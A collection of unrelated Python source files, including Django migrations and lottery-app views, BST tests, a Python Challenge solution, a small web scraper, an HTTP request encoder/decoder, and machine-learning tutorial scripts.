    leaves = size - (2 ** height - 1)
    half_leaves = 2 ** (height - 1)
    if leaves > half_leaves:
        left_size = 2 ** height - 1
    else:
        left_size = size - half_leaves
    root_index = start + left_size
    # recursively build the two subtrees around the chosen root
    root = Node(array[root_index])
    root.left = build_complete_bst(array, start, root_index)
    root.right = build_complete_bst(array, root_index + 1, end)
    return root
class BuildMinimalBSTTest(unittest.TestCase):
    """Exercises build_minimal_bst on empty / single / full / 4-node inputs."""

    def setUp(self):
        # subclass hook: swap in a different builder with the same contract
        self.build_bst = build_minimal_bst

    def test_build_empty(self):
        self.assertEqual(self.build_bst([], 0, 0), None)

    def test_build_one_node(self):
        root = self.build_bst([0], 0, 1)
        self.assertEqual(root.data, 0)
        self.assertEqual(root.left, None)
        self.assertEqual(root.right, None)

    def test_build_full(self):
        root = self.build_bst([0, 1, 2], 0, 3)
        self.assertEqual(root.left.data, 0)
        self.assertEqual(root.left.left, None)
        self.assertEqual(root.left.right, None)
        self.assertEqual(root.data, 1)
        self.assertEqual(root.right.data, 2)
        self.assertEqual(root.right.left, None)
        self.assertEqual(root.right.right, None)

    def test_build_complete(self):
        root = self.build_bst([0, 1, 2, 3], 0, 4)
        self.assertEqual(root.data, 2)
        self.assertEqual(root.left.data, 1)
        self.assertEqual(root.left.left.data, 0)
        self.assertEqual(root.left.left.left, None)
        self.assertEqual(root.left.left.right, None)
        self.assertEqual(root.left.right, None)
        self.assertEqual(root.right.data, 3)
        self.assertEqual(root.right.left, None)
        self.assertEqual(root.right.right, None)
class BuildCompleteBSTTest(BuildMinimalBSTTest):
    """Re-runs the parent's test cases against build_complete_bst."""

    def setUp(self):
        self.build_bst = build_complete_bst
# Run both test classes when executed directly.
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
    """Initial NGO app migration: School, Student (FK to School), and
    VolunteerProfile (one-to-one with the swappable auth user model)."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='School',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
                ('name', models.CharField(max_length=150)),
                ('district', models.CharField(max_length=150)),
            ],
        ),
        migrations.CreateModel(
            name='Student',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
                ('name', models.CharField(max_length=150)),
                ('age', models.IntegerField(default=0)),
                ('location', models.IntegerField(default=400010)),
                ('days_present', models.IntegerField(default=0)),
                ('days_total', models.IntegerField(default=0)),
                ('marks', models.TextField(blank=True)),
                ('sponsored', models.BooleanField(default=False)),
                ('school', models.ForeignKey(to='NGO.School')),
            ],
        ),
        migrations.CreateModel(
            name='VolunteerProfile',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
                ('contact', models.IntegerField(unique=True, default=0)),
                ('user', models.OneToOneField(related_name='profile', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
# Level 14
# http://www.pythonchallenge.com/pc/return/italy.html
# Unwind the 10000x1 pixel strip of wire.png into a 100x100 inward spiral.
from PIL import Image

image = Image.open('wire.png')
# direction vectors: right, down, left, up
delta = [(1, 0), (0, 1), (-1, 0), (0, -1)]
out = Image.new('RGB', [100, 100])
x, y, p = -1, 0, 0   # p walks along the source strip
d = 200
while d / 2 > 0:
    for v in delta:
        steps = d // 2   # side length shrinks as d decreases
        for s in range(steps):
            x, y = x + v[0], y + v[1]
            out.putpixel((x, y), image.getpixel((p, 0)))
            p += 1
        # NOTE(review): indentation reconstructed — d -= 1 per side matches
        # the 100,99,99,98,... spiral side lengths; confirm.
        d -= 1
out.show()
# Next level: http://www.pythonchallenge.com/pc/return/cat.html
# http://www.pythonchallenge.com/pc/return/uzi.html
|
import requests
from bs4 import BeautifulSoup
class spider:
    """Scrapes <p class="hc-2-name"> elements (city names, presumably)
    from the lysy90 store page and prints them."""

    def __init__(self):
        # target URL and a desktop Firefox User-Agent to avoid bot filtering
        self.url = "http://vip.lysy90store.xyz/cities"
        self.header = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'}

    def spider_lysy90(self):
        # fetch the page, parse it, and print every matching element
        response = requests.get(self.url,headers = self.header)
        lysy90 = response.content
        print(response.content)
        page = BeautifulSoup(lysy90,'html.parser')
        page_infos = page.find_all('p','hc-2-name')
        print(page_infos)
        for page_info in page_infos:
            print(page_info)
# Run the scraper immediately on execution (network side effect).
spider().spider_lysy90()
from __future__ import division
from django.shortcuts import render
from yoolotto.lottery.views import *
from yoolotto.lottery.ticket.views import *
from yoolotto.second_chance.models import *
from yoolotto.user.models import *
from yoolotto.coin.models import *
from yoolotto.lottery.models import LotteryDraw
from yoolotto.fantasy_lottery.models import *
from yoolotto.lottery.game.base import LotteryGame, LotteryPlayInvalidException, LotteryResultsInvalidException
# Create your views here.
def validate_numbers(numbers,game_type):
    """Validate one lottery line: 5 distinct white balls + 1 power/mega ball.

    game_type 21 (MegaMillions): white balls 1-75, mega ball 1-15.
    game_type 20 (Powerball): white balls 1-59, powerball 1-35
    (powerball == -1 skips the powerball check).
    Raises LotteryPlayInvalidException on any violation; returns True.
    Python 2 code (print statements, xrange).
    """
    if not numbers:
        raise LotteryPlayInvalidException("No number detected in white ball")
    if len(numbers)<5:
        raise LotteryPlayInvalidException("Please enter all white ball numbers")
    if len(numbers)==5:
        # exactly five numbers means the sixth (mega) ball is missing
        raise LotteryPlayInvalidException("Please enter Megaball number")
    print numbers
    print "numbers",type(numbers)
    white = numbers[0:5]
    powerball = numbers[5]
    print "white",white
    print "powerball",powerball
    print "length of white",len(set(white))
    if len(set(white)) != 5:
        # set collapse means at least one duplicate white ball
        raise LotteryPlayInvalidException("Duplicate Number %s" % white)
    if game_type == 21:#megamillion
        for number in white:
            if number not in xrange(1, 76):
                raise LotteryPlayInvalidException("Please enter valid white ball number")
        if powerball not in xrange(1, 16):
            raise LotteryPlayInvalidException("Please enter valid Megaball number")
    if game_type == 20:
        print "white",white
        for number in white:
            if number not in xrange(1, 60):
                print "number",number
                raise LotteryPlayInvalidException("Invalid White Ball Number %s" % number)
        if powerball != -1:
            if powerball not in xrange(1, 36):
                raise LotteryPlayInvalidException("Invalid Powerball Number %s" % powerball)
    return True
class QuickPick(View):
    """POST endpoint generating random "quick pick" lottery lines.

    Reads user, game_type (20=Powerball, 21=MegaMillions), division and
    line count from the JSON body; returns {"numbers": [...]} with one
    random 6-number line (5 white balls + 1 power/mega ball) per requested
    line. Python 2 code; indentation reconstructed from flattened source.
    """

    @rest
    @Authenticate()
    def post(self,request):
        data = json.loads(request.body)
        user = data["user"]
        user_id = user
        game_type = data["game_type"]
        division = data['division']
        submission = uuid.uuid4().hex[:16]  # random 16-hex id; not used below — TODO confirm
        print "submissssion",submission
        try:
            client_login_record, created = UserClientLogin.objects.get_or_create(device=request.yoo['device'])
        except:
            # duplicate rows make get_or_create raise: fall back to the first match
            client_login_record = UserClientLogin.objects.filter(device=request.yoo['device'])[0]
        #date = datetime.datetime.strptime(draw_date, "%Y-%m-%d").date()
        lines_no = data['lines']
        date = datetime.datetime.strptime(data["drawingDate"], "%Y-%m-%d").date()
        # map the request's game_type onto the division-specific component id
        if division == 'CA':
            game_types = {20:20,21:21}
            #components = {20:"Powerballca",21:"MegaMillionsCA"}
            division_id = 2
        else:
            game_types = {20:1,21:2}
            #components = {1:"Powerball",2:"MegaMillions"}
            division_id = 1
        game_types = game_types[game_type]
        draw, created = LotteryDraw.objects.get_or_create(component=game_types, date=date,division_id=division_id)
        ticket_record,created = FantasyTicket.objects.get_or_create(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no,draw_id = draw.id)
        submission_record = None
        numbers = []
        if game_type == 21:#megamillion
            # MegaMillions: 5 distinct white balls 1-75 + 1 mega ball 1-15
            for line in range(0,lines_no):
                import random
                white_ball = random.sample(range(1,76),5)
                power_ball = random.sample(range(1,16),1)
                numbers1 = white_ball + power_ball
                #print numbers
                numbers.append(numbers1)
        else:
            # Powerball: 5 distinct white balls 1-59 + 1 power ball 1-35
            for line in range(0,lines_no):
                import random
                white_ball = random.sample(range(1,60),5)
                power_ball = random.sample(range(1,36),1)
                numbers1 = white_ball + power_ball
                #print numbers
                numbers.append(numbers1)
        return {"numbers":numbers}
class SubmitNumbers(View):
    """Persist user-picked lottery lines against the correct draw.

    POST body: numbers (list of lines), game_type (1/0 flag), division,
    drawingDate (YYYY-MM-DD), lines.  Responds with the coin cost.
    """
    @rest
    @Authenticate()
    def post(self,request):
        data = json.loads(request.body)
        numbers = data['numbers']
        print "numbers in game",type(numbers)
        #user = data["user"]
        user = request.yoo["user"]
        user_id = user.id
        game_type = data["game_type"]
        division = data["division"]
        draw_date = data["drawingDate"]
        lines_no = data["lines"]
        # Each line costs 2 coins.
        coins = 2 * lines_no
        # Map the client game_type flag (1/0) onto per-division component ids.
        if division == 'CA':
            game_types = {1:20,0:21}
            components = {20:"Powerballca",21:"MegaMillionsCA"}
            division_id = 2
        else:
            game_types = {1:1,0:2}
            components = {1:"Powerball",2:"MegaMillions"}
            division_id = 1
        game_types = game_types[int(game_type)]
        submission_record = None
        # Random 16-char id grouping all plays created by this request.
        submission = uuid.uuid4().hex[:16]
        date = datetime.datetime.strptime(draw_date, "%Y-%m-%d").date()
        component = LotteryGameComponent.objects.get(identifier=components[game_types])
        draw, created = LotteryDraw.objects.get_or_create(component=component, date=date,division_id=division_id)
        try:
            ticket_info,created = FantasyTicket.objects.get_or_create(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no)
        except:
            # NOTE(review): bare except; also filter() returns a queryset,
            # not an instance (the trailing "[0]" is commented out), so the
            # attribute accesses below would fail on this path -- verify.
            ticket_info = FantasyTicket.objects.filter(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no)#[0]
        # NOTE(review): component=game_types passes the plain int here, while
        # the get_or_create above passed a LotteryGameComponent instance --
        # confirm both resolve to the same draw row.
        updated_draw, created = LotteryDraw.objects.get_or_create(component=game_types,division_id=division_id,date=date)
        tickets = {}
        # Reject any malformed line before touching the database further.
        for i in numbers:
            validate_numbers(i,game_type)
        if updated_draw.id != ticket_info.draw_id :
            # create new ticket
            print updated_draw.id
            new_ticket_info, created = FantasyTicket.objects.get_or_create(user=ticket_info.user,draw=updated_draw,division=division)
            valid_draw = updated_draw.id
            valid_ticket = new_ticket_info.id
            tickets[valid_ticket] = new_ticket_info
            submission_record, created = FantasyTicketSubmission.objects.get_or_create(submission=submission, ticket_id=valid_ticket)
            submission_record.save()
            # create new play
            for line in numbers:
                serialized = dumps(line)
                play_record = FantasyTicketPlay(play=serialized,ticket_id=int(new_ticket_info.id),division = division)
                play_record.submission_old = submission
                play_record.submission = submission_record
                play_record.save()
        else:
            # - if draw is same
            valid_draw = ticket_info.draw_id
            valid_ticket = ticket_info.id
            tickets[valid_ticket] = ticket_info
            submission_record, created = FantasyTicketSubmission.objects.get_or_create(submission=submission, ticket_id=valid_ticket)
            submission_record.save()
            #update previous play
            for line in numbers:
                serialized = dumps(line)
                play_record, created = FantasyTicketPlay.objects.get_or_create(play=serialized,ticket=ticket_info,division=LotteryCountryDivision.objects.get(remote_id=division))
                play_record.submission_old = submission
                play_record.submission = submission_record
                play_record.save()
        return {"success":True,"coins":coins}
class FantasyTicketCheck(View):
    """Check a fantasy ticket against its draw result and allocate coins."""
    @rest
    @Authenticate(create=False)
    def post(self, request, _id):
        user = request.yoo["user"]
        ticket = FantasyTicket.objects.get(pk=_id)
        # NOTE(review): compares the user_id field with the user object
        # itself (not user.id) -- if yoo["user"] is a model instance this
        # would always fail authorization; confirm the intended comparison.
        if ticket.user_id!= user:
            raise exceptions.WebServiceAuthorizationFailed()
        # NOTE(review): draw_id is dereferenced like a related object
        # (".result"); confirm the field really is named draw_id.
        if ticket.draw_id.result:
            # Mark every submission on this ticket as checked.
            for submission in ticket.submissions.all():
                submission.checked = True
                submission.save()
        # update(full=True) is expected to return the coins allocated.
        allocated = ticket.update(full=True)
        _result = ticket.representation()
        _result["coins"] = allocated
        return _result
    def put(self, *args, **kwargs):
        # PUT is an alias for POST.
        return self.post(*args, **kwargs)
class httpencode:
    """Build a minimal HTTP/1.x request string.

    Set headers via addheader(), optionally append body text, then call
    encode() to get the full request.
    """
    def __init__(self, url, method="PUT", version="HTTP/1.1"):
        self.url = url
        self.method = method
        self.version = version
        self.headers = {}
        self.body = ""
    def addheader(self, key, value):
        """Set (or overwrite) a header."""
        self.headers[key] = value
    def delheader(self, key):  # fixed: the original was missing the colon
        """Remove a header; raises KeyError if absent."""
        del self.headers[key]
    def appendbody(self, data):
        # Fixed: self.body is a str, which has no .append(); concatenate.
        self.body += data
    def resetbody(self):
        """Discard any accumulated body."""
        self.body = ""
    def encode(self):
        """Return the request line, headers and (optional) body as one string."""
        url = "%s %s %s\r\n" %(self.method, self.url, self.version)
        if self.method == "POST":
            # POST always advertises keep-alive plus an accurate length.
            self.addheader("Connection", "Keep-Alive")
            self.addheader("Content-Length", str(len(self.body)))
        headerlist = [ "%s: %s" %(k, v) for k, v in self.headers.items()]
        header = "\r\n".join(headerlist)
        if len(self.body) > 0:
            return url + header + "\r\n\r\n" + self.body
        else:
            return url + header + "\r\n"
#User-Agent: the type of browser/client that issued the request.
#Accept: the list of content types the client can handle.
#Host: the requested host name; lets several domain names share one IP address (virtual hosting).
#Connection: Keep-Alive
class httpdecode:
    """Parse a raw HTTP request string into method/url/version/headers/body.

    Fixed: the original mixed bytes literals with str operations (split,
    replace), which only works on Python 2 where bytes is str; all
    literals are now str, so a str request also parses on Python 3.
    """
    def __init__(self, str):
        self.all = str
        self.body = ""
        self.method = ""
        self.url = ""
        self.version = ""
        self.headers = {}
    def decode(self):
        """Populate method/url/version/headers/body from self.all."""
        # Head and body are separated by the first blank line.
        index0 = self.all.find("\r\n\r\n")
        request_predata = self.all[0:index0]
        # First line: "<METHOD> <URL> <VERSION>".
        index1 = request_predata.find("\r\n")
        request_first_data = request_predata[0:index1]
        tags = request_first_data.split(" ")
        self.method = tags[0]
        self.url = tags[1]
        self.version = tags[2]
        request_header_data = request_predata[index1:]
        for line in request_header_data.split("\r\n"):
            if line != "":
                # Strip all spaces, then split "Key:Value".
                line = line.replace(" ","")
                restemp = line.split(":")
                # Re-join "Host: name:port", which splits into three parts.
                if restemp[0] == "Host" and len(restemp) == 3:
                    restemp[1] = restemp[1] + ":" +restemp[2]
                self.headers[restemp[0]] = restemp[1]
        if index0 >= 0:
            self.body = self.all[index0+4:]
from __future__ import (division, print_function)
from WMCore.REST.CherryPyPeriodicTask import CherryPyPeriodicTask
from WMCore.Services.WMStats.WMStatsWriter import WMStatsWriter, convertToServiceCouchDoc
class HeartbeatMonitorBase(CherryPyPeriodicTask):
    """Periodic task that reports component thread status to central WMStats."""
    def __init__(self, rest, config):
        super(HeartbeatMonitorBase, self).__init__(config)
        # Writer handle to the central WMStats instance.
        self.centralWMStats = WMStatsWriter(config.wmstats_url)
        # Component threads whose liveness is reported.
        self.threadList = config.thread_list
    def setConcurrentTasks(self, config):
        """
        Set the list of function references for concurrent tasks.
        """
        self.concurrentTasks = [{'func': self.reportToWMStats, 'duration': config.heartbeatCheckDuration}]
    def reportToWMStats(self, config):
        """
        Report thread status and heartbeat.
        Additional monitoring information can be reported by overriding the
        addAdditionalMonitorReport method.
        """
        self.logger.info("Checking Thread status...")
        # NOTE(review): self.logDB is not assigned in this class --
        # presumably provided by CherryPyPeriodicTask or a subclass; confirm.
        downThreadInfo = self.logDB.wmstats_down_components_report(self.threadList)
        monitorInfo = self.addAdditionalMonitorReport(config)
        downThreadInfo.update(monitorInfo)
        # Convert to a couch service document and push to WMStats.
        wqSummaryDoc = convertToServiceCouchDoc(downThreadInfo, config.log_reporter)
        self.centralWMStats.updateAgentInfo(wqSummaryDoc)
        self.logger.info("Uploaded to WMStats...")
        return
    def addAdditionalMonitorReport(self, config):
        """
        Add an additional report alongside the heartbeat report.
        Override in each application with its monitoring info (must follow
        the format displayed in WMStats).  Base implementation reports nothing.
        """
        return {}
# Generated by Django 3.2.4 on 2021-06-29 17:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: make Card.deck and Deck.owner nullable foreign keys."""

    dependencies = [
        ('cards', '0002_auto_20210629_1348'),
    ]

    operations = [
        migrations.AlterField(
            model_name='card',
            name='deck',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='cards.deck'),
        ),
        migrations.AlterField(
            model_name='deck',
            name='owner',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_deck', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
import random
class Card():
    """One playing card: a suit name plus a rank number (1-13)."""

    def __init__(self, suit, number):
        # Store the identifying pair verbatim.
        self.suit = suit
        self.number = number

    def __repr__(self):
        # Render as "<suit>:<number>", e.g. "Spade:1".
        return "%s:%s" % (self.suit, self.number)
class Deck():
    """A standard 52-card deck: 4 suits x 13 ranks."""
    suits = ["Spade", "Heart", "Diamond", "Clover"]
    numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
    def __init__(self):
        # Build one Card per (suit, number) combination -- 52 in total.
        self.cards = []
        for suit in self.suits:
            for number in self.numbers:
                card = Card(suit, number)
                self.cards.append(card)
    def shuffle(self):
        """Randomly reorder self.cards in place.

        Fixed: the original iterated a hard-coded range(52), which raises
        once any cards have been drawn; iterate over the current size.
        """
        self.new_cards = []
        for i in range(len(self.cards)):
            random_card = random.choice(self.cards)
            self.cards.remove(random_card)
            self.new_cards.append(random_card)
        self.cards = self.new_cards
class Player():
    """Holds a hand of cards and exchanges cards with a deck."""

    def __init__(self):
        # The player's current hand.
        self.cards = []

    def draw(self, deck, draw_number=1):
        """Take draw_number cards off the top (end) of deck into the hand."""
        for _ in range(draw_number):
            self.cards.append(deck.cards.pop())

    def give(self, deck, card):
        """Move a specific card from the hand back onto the deck."""
        self.cards.remove(card)
        deck.cards.append(card)
# Demo: deal two hands, then move a user-chosen card from one hand to the other.
the_deck = Deck()
the_deck.shuffle()
me = Player()
bob = Player()
me.draw(the_deck,5)
bob.draw(the_deck,5)
print(me.cards)
# input() returns a string such as "Spade:1"; match it against each card's
# repr to recover the Card object.  (Fixed: the original passed the raw
# string straight to give(), so list.remove always raised ValueError.)
chosen_repr = input("Which card do you wannna give bob?\n")
chosen_card = next(card for card in me.cards if repr(card) == chosen_repr)
me.give(bob,chosen_card)
print(me.cards)
print(bob.cards)
|
"""Module with the Constants used in the kytos/Kronos."""
DEFAULT_BACKEND = 'INFLUXDB'
BACKENDS = {}
BACKENDS['INFLUXDB'] = {
'USER': 'foo',
'PASS': 'bar',
'PORT': 8086,
'HOST': 'localhost',
'DBNAME': 'kytos',
'POOL_SIZE': 100
}
BACKENDS['CSV'] = {
'USER': 'foo',
'PATH': 'data/'
}
|
if __name__ == "__main__":
x1, y1 = map(int, input().split())
x2, y2 = map(int, input().split())
n = int(input())
dx = abs(x2 - x1)
dy = abs(y2 - y1)
n -= dx
n -= dy
if n < 0 or n % 2 != 0:
print("N")
else:
print("Y")
|
# Linear regression with TF
# from '09_up_and_running_with_tensorflow.jpynb'
#
# Use TF optimizer
#
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.datasets import fetch_california_housing
def reset_graph(seed=42):
    """Reset the TF default graph and reseed TF/NumPy for reproducible runs."""
    tf.reset_default_graph()
    tf.set_random_seed(seed)
    np.random.seed(seed)
reset_graph()

# California housing data with a leading bias column of ones.
housing = fetch_california_housing()
m,n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
#%%
X = tf.constant(housing_data_plus_bias, dtype=tf.float32, name="X")
y = tf.constant(housing.target.reshape(-1, 1), dtype=tf.float32, name="y")
#%%
# Use batch gradient descent --------------------------------------------
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
# scale the data (gradient descent converges poorly on unscaled features)
scaled_housing_data = scaler.fit_transform(housing.data)
scaled_housing_data_plus_bias = np.c_[np.ones((m, 1)), scaled_housing_data]
reset_graph()
n_epochs = 1000 # number of iterations of gradient descent algorithm
learning_rate = 0.01 # gradient descent step size
X = tf.constant(scaled_housing_data_plus_bias, dtype=tf.float32, name="X")
y = tf.constant(housing.target.reshape(-1, 1), dtype=tf.float32, name="y")
# Random initial weights in [-1, 1); shape (n features + bias, 1).
theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name="theta")
y_pred = tf.matmul(X, theta, name="predictions")
error = y_pred - y
# Computes the mean (reduces to a scalar value)
mse = tf.reduce_mean(tf.square(error), name="mse")
# Using TF's optimizer (here a gradient descent optimizer)
optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate)
training_op = optimizer.minimize(mse)
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init) # Do this once at the beginning of all the iterations
    for epoch in range(n_epochs): # iterate over the training epochs
        if epoch % 100 == 0:
            # Log training progress every 100 epochs.
            print("Epoch", epoch, "MSE =", mse.eval())
        sess.run(training_op)
    best_theta = theta.eval()
import matplotlib.pylab as plt
from NeuralNetwork.ShallowNeuralNetwork.testCases import *
import sklearn.linear_model
from NeuralNetwork.ShallowNeuralNetwork.planar_utils import plot_decision_boundary, load_planar_dataset
X, Y = load_planar_dataset()
# Visualize the planar "flower" dataset (2-D points, binary labels).
plt.scatter(X[0, :], X[1, :], c=np.squeeze(Y), s=40, cmap=plt.cm.Spectral)
shape_X = X.shape
shape_Y = Y.shape
# Number of training examples (one column per example).
m = X.shape[1]
print("The shape of X is: " + str(shape_X))
print("The shape of Y is: " + str(shape_Y))
print("The number of training examples is: " + str(m))
clf = sklearn.linear_model.LogisticRegressionCV() # choose the regularization parameter C via cross-validation
clf.fit(X.T, Y.T) # fit() expects one row per sample, so transpose X and Y
plot_decision_boundary(lambda x: clf.predict(x), X, Y)
plt.title("Logistic Regression")
LR_predictions = clf.predict(X.T)
# Accuracy = (true positives + true negatives) / total examples, in percent.
print("Accuracy of logistic regression: %d" % float((np.dot(Y, LR_predictions) + np.dot(1 - Y, 1 - LR_predictions)) / float(Y.size) * 100) + '%' + "(percentage of correctly labelled datapoints)")
#plt.show()
#LogisticRegression did not work well on non-linear model like "flower dataset"
|
#!/usr/bin/python3
"""MyInt"""
class MyInt(int):
    """An int whose == and != comparison operators are deliberately swapped."""

    def __eq__(self, value):
        """Behave like int's != : True when the values differ."""
        return not self.real == value

    def __ne__(self, value):
        """Behave like int's == : True when the values match."""
        return not self.real != value
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-27 13:56
from __future__ import unicode_literals
from django.db import migrations, models
import question.models
class Migration(migrations.Migration):
    """Auto-generated: route Question audio/script/video uploads through upload_location."""

    dependencies = [
        ('question', '0005_auto_20170115_1759'),
    ]

    operations = [
        migrations.AlterField(
            model_name='question',
            name='audio',
            field=models.FileField(blank=True, upload_to=question.models.upload_location),
        ),
        migrations.AlterField(
            model_name='question',
            name='script',
            field=models.FileField(blank=True, upload_to=question.models.upload_location),
        ),
        migrations.AlterField(
            model_name='question',
            name='video',
            field=models.FileField(blank=True, upload_to=question.models.upload_location),
        ),
    ]
|
from django.conf.urls import url
from django.urls import include
from rest_framework import routers
from articles.views import ArticleViewSet, ArticleChangesListViewSet, SetCurrentChangeSetView
# DRF router exposing the article endpoints.
router = routers.DefaultRouter()
router.register(r'article', ArticleViewSet)
router.register(r'article_changeset', ArticleChangesListViewSet)

urlpatterns = [
    url(r'^', include(router.urls)),
    # e.g. /set_changeset/42/ -- selects the active changeset.
    url(r'^set_changeset/(?P<changeset_id>\d+)/?$', SetCurrentChangeSetView.as_view()),
]
# import re
# file = open("cleaned.csv", 'w', encoding='utf-8')
# file.write("PID,Player,Team,Apps,Minutes,Goals,Assists,xG,xA,xG90,xA90\n")
# for line in open("test.txt", encoding='utf-8'):
# #line = line.replace("\+\d.\d\d\s"," ")
# line = re.sub(r"\+\d.\d\d\s", " ", line)
# line = re.sub(r"\-\d.\d\d\s", " ", line)
# if len(line)>43:
# line = line.replace(" ", ",", 1)
# line = line.replace(" Arsenal",",Arsenal")
# line = line.replace(" Bournemouth",",Bournemouth")
# line = line.replace(" Brighton",",Brighton")
# line = line.replace(" Burnley",",Burnley")
# line = line.replace(" Chelsea",",Chelsea")
# line = line.replace(" Crystal Palace",",Crystal Palace")
# line = line.replace(" Everton",",Everton")
# line = line.replace(" Huddersfield",",Huddersfield")
# line = line.replace(" Leicester",",Leicester")
# line = line.replace(" Liverpool",",Liverpool")
# line = line.replace(" Manchester City",",Manchester City")
# line = line.replace(" Manchester United",",Manchester United")
# line = line.replace(" Newcastle United",",Newcastle United")
# line = line.replace(" Southampton",",Southampton")
# line = line.replace(" Stoke",",Stoke")
# line = line.replace(" Swansea",",Swansea")
# line = line.replace(" Tottenham",",Tottenham")
# line = line.replace(" Watford",",Watford")
# line = line.replace(" West Bromwich Albion",",West Bromwich Albion")
# line = line.replace(" West Ham",",West Ham")
# line = line.replace(" 0",",0")
# line = line.replace(" 1",",1")
# line = line.replace(" 2",",2")
# line = line.replace(" 3",",3")
# line = line.replace(" 4",",4")
# line = line.replace(" 5",",5")
# line = line.replace(" 6",",6")
# line = line.replace(" 7",",7")
# line = line.replace(" 8",",8")
# line = line.replace(" 9",",9")
# line = line.replace("-",",-")
# line = line.replace("+",",+")
# line = line.replace("n,-","n-")
# line = line.replace("o,-","o-")
# line = line.replace("g,-","g-")
# line = line.replace("u,-","u-")
# line = line.replace("s,-","s-")
# line = line.replace("d,-","d-")
# line = line.replace("r,-","r-")
# line = line.replace("e,-","e-")
# line = line.replace("t,-","t-")
# file.write(line)
import pandas as pd
# Load the cleaned player-stats CSV produced by the (commented-out)
# text-cleaning pass above, and display it.
df = pd.read_csv('cleaned.csv')
print(df)
####THIS FILE USES THE DICTIONARY TO EXTRACT ASPECTS RATHER THAN THE
####SEMANTIC DIFFERENCE. USE BWT_PROCESS_SENTENCE.PY IF YOU WANT SEMANTIC DIFFERENCE
import csv
import string
import re
from nltk.corpus import wordnet as wn
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk import pos_tag
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import stopwords
import pickle
test_sent = "This is Brendan's test sentence, it contains GAS, gas, gas and gas and ENGINE and CLIMATE."

# Previously hard-coded location of the aspect taxonomy CSV
# (rows of: aspect word, synonym, weight).
DEFAULT_TAXONOMY_PATH = '/home/sysadmin/gmrepo/GMCustSent/rankcars/scripts/taxdictionarytrimmed.csv'

def processSentenceDictionary(input_sentence, taxonomy_path=DEFAULT_TAXONOMY_PATH):
    """Return the list of taxonomy aspects mentioned in input_sentence.

    The sentence is stripped of punctuation and stop words, POS-tagged,
    lemmatized, and each lemma is matched against the taxonomy's aspect
    words and their synonyms.

    Parameters:
        input_sentence: raw sentence text.
        taxonomy_path: CSV of (aspect, synonym, weight) rows; defaults to
            the previously hard-coded deployment path, so existing callers
            are unaffected.
    """
    # Build a regex character class from all punctuation and delete it.
    # (str.translate-based approaches did not work with the web interface.)
    remove_str = '[' + string.punctuation + ']'
    noPunctuation = re.sub(remove_str, '', input_sentence)
    # Tokenize the sentence and tag each word's part of speech.
    sentenceWords = word_tokenize(noPunctuation)
    posTagged = pos_tag(sentenceWords)
    removeTheseWords = set(stopwords.words('english'))
    # Drop stop words and very short words from the tagged list.
    posTaggedNoStopWords = [(word.lower(), pos) for (word, pos) in posTagged
                            if word.lower() not in removeTheseWords and
                            len(word) > 2]
    # Keep only adjectives, verbs, nouns and adverbs, mapped to WordNet tags.
    wn_tag_by_prefix = (('J', wn.ADJ), ('V', wn.VERB), ('N', wn.NOUN), ('R', wn.ADV))
    convertedPOSTags = []
    for word, pos in posTaggedNoStopWords:
        for prefix, wn_tag in wn_tag_by_prefix:
            if pos.startswith(prefix):
                convertedPOSTags.append((word, wn_tag))
    # Reduce each word to its lemma root using its part-of-speech tag.
    lemmatizer = WordNetLemmatizer()
    lemmatizedSentence = [lemmatizer.lemmatize(word, tag) for (word, tag) in convertedPOSTags]
    # Read the taxonomy: aspect words, their synonyms, and weights.
    taxwords = []
    taxsynonyms = []
    taxweights = []
    with open(taxonomy_path, 'r') as taxonomy:
        readfile = csv.reader(taxonomy)
        for row in readfile:
            if row[0] not in taxwords:
                taxwords.append(row[0])
                taxsynonyms.append([])
                taxweights.append(row[2])
            taxsynonyms[taxwords.index(row[0])].append(row[1])
    # A lemma counts as an aspect if it equals the aspect word or any synonym.
    sentenceAspects = []
    for word in lemmatizedSentence:
        for tax in taxwords:
            if word.lower() == tax.lower() and tax not in sentenceAspects:
                sentenceAspects.append(tax)
            elif taxsynonyms[taxwords.index(tax)]:
                for taxsyn in taxsynonyms[taxwords.index(tax)]:
                    if word.lower() == taxsyn.lower() and tax not in sentenceAspects:
                        sentenceAspects.append(tax)
    return sentenceAspects
###debugging print statement using test sentence
##print(processSentenceDictionary(test_sent))
|
# Print the first whitespace-delimited field of the last line of rule.txt.
# NOTE(review): if print(id) was meant to run per line it belongs inside
# the for-loop; the original indentation was ambiguous -- confirm.
with open('rule.txt') as f:
    id = ''
    lines = f.readlines()
    for line in lines:
        id = line.split(' ')[0]
    print(id)
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister, execute, Aer
#Subroutines

